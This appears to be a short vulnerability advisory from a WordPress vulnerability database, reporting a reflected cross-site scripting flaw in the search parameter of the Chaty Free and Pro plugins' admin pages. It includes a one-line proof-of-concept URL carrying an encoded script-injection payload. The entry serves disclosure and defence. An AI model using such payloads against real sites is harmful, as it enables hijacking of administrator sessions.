Lucene search

K
wpvulndbKrzysztof ZającWPVDB-ID:B5035987-6227-4FC6-BC45-1E8016E5C4C0
HistoryDec 06, 2021 - 12:00 a.m.

Chaty Free < 2.8.3 & Pro < 2.8.2 - Reflected Cross-Site Scripting

2021-12-0600:00:00
Krzysztof Zając
wpscan.com
10
chaty
free
pro
versions
2.8.3
security
reflected
cross-site
scripting

EPSS

0.001

Percentile

46.7%

The plugins do not sanitise and escape the search parameter before outputting it back in the admin dashboard, leading to a Reflected Cross-Site Scripting

PoC

http://example.com/wp-admin/admin.php?page=chaty-contact-form-feed&amp;search;=<%2Fscript><img+src+onerror%3Dalert(/XSS/)>

EPSS

0.001

Percentile

46.7%

Related for WPVDB-ID:B5035987-6227-4FC6-BC45-1E8016E5C4C0